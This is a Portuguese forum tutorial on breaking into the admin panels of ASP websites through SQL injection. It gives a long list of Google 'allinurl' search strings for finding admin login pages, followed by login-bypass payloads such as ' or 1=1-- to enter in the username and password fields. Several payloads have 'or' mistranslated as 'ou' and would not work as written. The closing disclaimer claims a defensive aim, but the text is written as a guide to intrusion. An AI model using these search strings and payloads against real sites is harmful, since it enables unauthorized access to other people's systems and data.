SQL injection com asp

SQL injection com asp

Olá galera.
Fiz este pequeno tutorial meio as pressas,mas espero que voces gostem,principalmente quem esta começando agora Vou acessar o painel administrativo de um site através de uma técnica chamada “ SQL injection “. Primeiramente,vou ensinar a voces como pesquisarem por sites vulneraveis a SQL injection com o próprio site do GOOGLE.
1) Acesse http://www.google.com.br

2) Pesquise por qualquer uma das strings abaixo:

Citação:

allinurl:admin/index.asp allinurl:admin/default.asp allinurl:admin/admin.asp allinurl:admin/login.asp allinurl:/admin/entrar.asp allinurl:/admin/default.asp allinurl:/admin/index.asp allinurl:/admin/login.asp allinurl:/admin/password.asp allinurl:/admin/senha.asp allinurl:/login/login.asp allinurl:/adm/login.asp allinurl:/adm/index.asp allinurl:/adm/default.asp allinurl:/login/index.asp allinurl:/login/default.asp allinurl:/webmaster/login.asp allinurl:/webadmin/default.asp allinurl:/webadmin/index.asp allinurl:/webadmin/default.asp allinurl:/menu_admin/default.asp allinurl:/menu_admin/index.asp allinurl:/menu_admin/login.asp allinurl:/noticias/admin/ allinurl:/news/admin/ allinurl:/cadastro/admin/ allinurl:/portal/admin/ allinurl:/site/admin/ allinurl:/home/admin.asp allinurl:/home/admin/index.asp allinurl:/home/admin/default.asp allinurl:/home/admin/login.asp allinurl:/web/admin/index.asp allinurl:/web/admin/default.asp allinurl:/web/admin/login.asp allinurl:/home/adm/login.asp allinurl:/home/adm/senha.asp allinurl:/home/adm/index.asp allinurl:/home/adm/defaul.asp allinurl:/menu/admin/index.asp allinurl:/menu/admin/default.asp allinurl:/menu/admin/login.asp allinurl:/menu/admin/admin.asp allinurl:/painel/admin/admin.asp allinurl:/painel/admin/login.asp allinurl:/painel/admin/index.asp allinurl:/painel/admin/default.asp allinurl:/site/admin/default.asp allinurl:/site/admin/index.asp allinurl:/site/admin/login.asp allinurl:/asp/admin/login.asp allinurl:/asp/admin/index.asp allinurl:/asp/admin/default.asp allinurl:/shop/admin/default.asp allinurl:/shop/admin/index.asp allinurl:/shop/admin/login.asp allinurl:/ecommerce/admin/index.asp allinurl:/ecommerce/admin/default.asp allinurl:/ecommerce/admin/login.asp allinurl:/pedidos/admin/default.asp allinurl:/pedidos/admin/index.asp allinurl:/pedidos/admin/login.asp allinurl:/compras/admin/ allinurl:/clientes/admin/ allinurl:/busines/admin/ allinurl:/area_restrita/admin.asp allinurl:/area_restrita/login.asp allinurl:/area_restrita/index.asp allinurl:/acesso/admin.asp allinurl:/acesso/admin/default.asp allinurl:/acesso/admin/index.asp allinurl:/post/admin/default.asp allinurl:/post/admin/ allinurl:/post/admin/index.asp allinurl:/post/admin/login.asp allinurl:/eshop/admin/ allinurl:/eshop/admin.asp allinurl:/eshop/admin/default.asp allinurl:/eshop/admin/index.asp allinurl:/comercio/admin.asp allinurl:/comercio/admin/default.asp allinurl:/comercio/admin/index.asp allinurl:/news/admin/login.asp allinurl:/news/admin/default.asp allinurl:/news/admin/index.asp allinurl:/imprensa/login.asp allinurl:/imprensa/admin.asp allinurl:/imprensa/admin/default.asp allinurl:/imprensa/admin/index.asp allinurl:/imprensa/admin/login.asp allinurl:/banners/admin.asp allinurl:/banners/admin/default.asp allinurl:/banners/admin/index.asp allinurl:/banners/admin/login.asp allinurl: allinurl:/banner/admin/ allinurl:/banner/admin/default.asp allinurl:/banner/admin/index.asp allinurl:/newsleter/admin.asp allinurl:/newsleter/admin/default.asp allinurl:/newsleter/admin/index.asp allinurl:/principal/admin.asp allinurl:/principal/admin/default.asp allinurl:/principal/admin/index.asp allinurl:/principal/admin/login.asp allinurl:/editar/admin.asp allinurl:/editar/admin/login.asp allinurl:/editar/admin/index.asp allinurl:/editar/admin/default.asp allinurl:/form/admin.asp allinurl:/admin/admin.asp allinurl:/admin/index.asp allinurl:/admin/admin/default.asp allinurl:/edit/admin/index.asp allinurl:/edit/admin/default.asp allinurl:/menu/admin/senha.asp allinurl:/painel/admin/senha.asp allinurl:/menu_admin/senha.asp allinurl:/pedidos/admin/senha.asp allinurl:/vendas/admin/senha.asp allinurl:/principal/admin/senha.asp allinurl:/home/admin/senha.asp allinurl:/news/admin/senha.asp allinurl:/noticias/admin/senha.asp allinurl:/portal/admin/senha.asp allinurl:/site/admin/senha.asp allinurl:/admin/admin/adm.asp allinurl:/admin/adm/senha.asp allinurl:/adm/admin/login.asp allinurl:/adm/admin/index.asp allinurl:/adm/admin/default.asp allinurl:/admin/loja/senha.asp allinurl:/admin/lojas/default.asp allinurl:/admin/lojas/index.asp allinurl:/loja/admin.asp allinurl:/db/admin/index.asp allinurl:/db/admin/login.asp allinurl:/db/admin/default.asp allinurl:/db/admin/senha.asp allinurl:/host/admin/default.asp allinurl:/host/admin/index.asp allinurl:/host/admin/login.asp allinurl:/login/admin.asp allinurl:/login_admin/index.asp allinurl:/login_admin/default.asp allinurl:/login_admin/login.asp allinurl:/store/admin.asp allinurl:/store/admin/default.asp allinurl:/store/admin/index.asp allinurl:/stroe/admin/login.asp allinurl:/images/admin/ allinurl:/client/admin.asp allinurl:/order/admmin.asp allinurl:/order/admin/index.asp allinurl:/order/admin/login.asp allinurl:/order/admin/default.asp allinurl:/admin/senha.asp allinurl:/strore/admin/senha.asp allinurl:/controle/admin.asp allinurl:/controle/admin/index.asp allinurl:/controle/admin/default.asp allinurl:/controle/admin/login.asp allinurl:/parceiros/admin.asp allinurl:/parceiros/admin/login.asp allinurl:/parceiros/admin/default.asp allinurl:/parceiros/admin/index.asp allinurl:/administrador/login.asp allinurl:/webmaster/login.asp allinurl:/webmaster/senha.asp allinurl:/webmaster/autenticar.asp allinurl:/admin/autenticar.asp allinurl:/admin/logout.asp allinurl:/admin/logar.asp allinurl:/webmaster/logar.asp allinurl:/store/admin/logar.asp allinurl:/shopping/admin.asp allinurl:/shopping/admin/login.asp allinurl:/shopping/admin/index.asp allinurl:/shopping/admin/default.asp allinurl:/admin/menu.asp allinurl:/admin/painel.asp allinurl:/shop/admin/logar.asp allinurl:/admin/acesso.asp allinurl:/restrito/admin.asp allinurl:/restrito/acesso/admin.asp allinurl:/restrito/adm/login.asp allinurl:/webmaster/entrar.asp allinurl:/admin/site/entrar.asp allinurl:/ecommerce/admin/index.asp allinurl:/ecommerce/admin/default.asp allinurl:/ecommerce/admin/login.asp


Após voces pesquisarem,uma série de píginas serão encontradas.
Geralmente quando voce acessa uma destas píginas,voce ira cair na tela de “login” do administrador,onde voce deve digitar o nome de usuario e a senha para conseguir acesso ADM do site.
É aqui que usamos o SQL injection,ao invés de colocarmos a senha,usamos algumas strings nos campos de logins,caso voce consiga acessar o painel de controle do ADM,é porque o site esta vulneravel a SQL injection.
Abaixo vou colocar algumas strings para voces colocarem nos campos de logins: ( Só lembrando que cada string serve para o campo "nome de usuario" e o campo "senha" ao mesmo tempo )


Citação:

b' or ' 1='
' or '1
' or '
' or 'a'='a
' or ''='
' or 1=1--
') or ('a'='a
' or '1'='1
admin ' - -
' ou 0=0 --
"ou 0=0 --
ou 0=0 --
' ou 0=0 #
"ou 0=0 #
ou 0=0 #
' ou ' x'='x
"ou" x"="x
') ou (' x'='x
' ou 1=1 --
"ou 1=1 --
ou 1=1 --
' ou a=a --
"ou" a"="a
') ou (' a'='a
") ou ("a"="a
hi "ou" a"="a
hi "ou 1=1 --
hi ' ou 1=1 --
hi ' ou ' a'='a
hi ') ou (' a'='a
hi") ou ("a"="a

Só lembrando que qualquer bom scanner detecta esta vulnerabilidade,o ACUNETIX é um exemplo de um programa de scan .

NÂO NOS RESPOSABILIZAMOS POR QUALQUER ATO PRATICADO POR VOCÊS PERANTE ESTE TUTORIAL O OBJETIVO DESSE TUTORIAL É EVITAR ESSE TIPO DE FALHA.

Este tutorial realmente é para o pesoa que esta começando,aconselho a voces darem uma estudada em PHP injection e principalmente em XSS,que para mim é a técnica do futuro,pois muitos sites estão vulneraveis.

>>BY TeCnOhEnRy <<